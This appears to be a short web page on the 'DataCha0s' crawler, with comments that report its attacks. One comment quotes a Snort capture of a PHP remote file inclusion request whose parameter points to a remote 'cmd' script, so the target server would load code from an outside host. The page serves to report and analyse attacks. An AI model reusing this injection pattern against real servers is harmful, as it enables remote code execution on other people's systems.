DataCha0s


URL’s for more information :

2 Responses to “DataCha0s”

  1. Reg Quinton says:

    This robot seems to be doing PHP injection attacks as well. Snort packet capture:

    07/19-02:12:29.380290 200.215.129.70:44232 -> 129.97.128.84:80
    TCP TTL:47 TOS:0x0 ID:12084 IpLen:20 DgmLen:239 DF
    ***AP*** Seq: 0xF2D04426 Ack: 0x225106 Win: 0x16D0 TcpLen: 32
    TCP Options (3) => NOP NOP TS: 1411345356 2713027245
    47 45 54 20 2F 68 69 73 74 6F 72 79 2F 63 6F 6D GET /history/com
    70 6C 65 74 65 73 65 61 73 6F 6E 64 65 74 61 69 pleteseasondetai
    6C 73 2E 70 68 70 3F 53 65 61 73 6F 6E 3D 68 74 ls.php?Season=ht
    74 70 3A 2F 2F 77 77 77 2E 75 6E 6C 6F 63 6B 70 tp://www.unlockp
    6C 61 7A 61 2E 6E 6C 2F 6D 65 64 69 61 2F 63 6D laza.nl/media/cm
    64 3F 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E d? HTTP/1.0..Con
    6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A nection: close..
    55 73 65 72 2D 41 67 65 6E 74 3A 20 44 61 74 61 User-Agent: Data
    43 68 61 30 73 2F 32 2E 30 0D 0A 48 6F 73 74 3A Cha0s/2.0..Host:
    20 77 77 77 2E 77 61 72 72 69 6F 72 6D 65 6E 73 www.warriormens
    62 61 73 6B 65 74 62 61 6C 6C 2E 75 77 61 74 65 basketball.uwate
    72 6C 6F 6F 2E 63 61 0D 0A 0D 0A rloo.ca....

    The content they’re trying to eject is clearly malicious:

    Angels of Death > #AoD > irc.gigachat.net > CMD > File List

  2. Reg Quinton says:

    DataCha0s seems to be a small group of Brazilian hackers. Their brag page is here:

    http://www.invasao.com.br/grupo04.htm

    I’m seeing lots of different attacks. I assume some common code they’re sharing.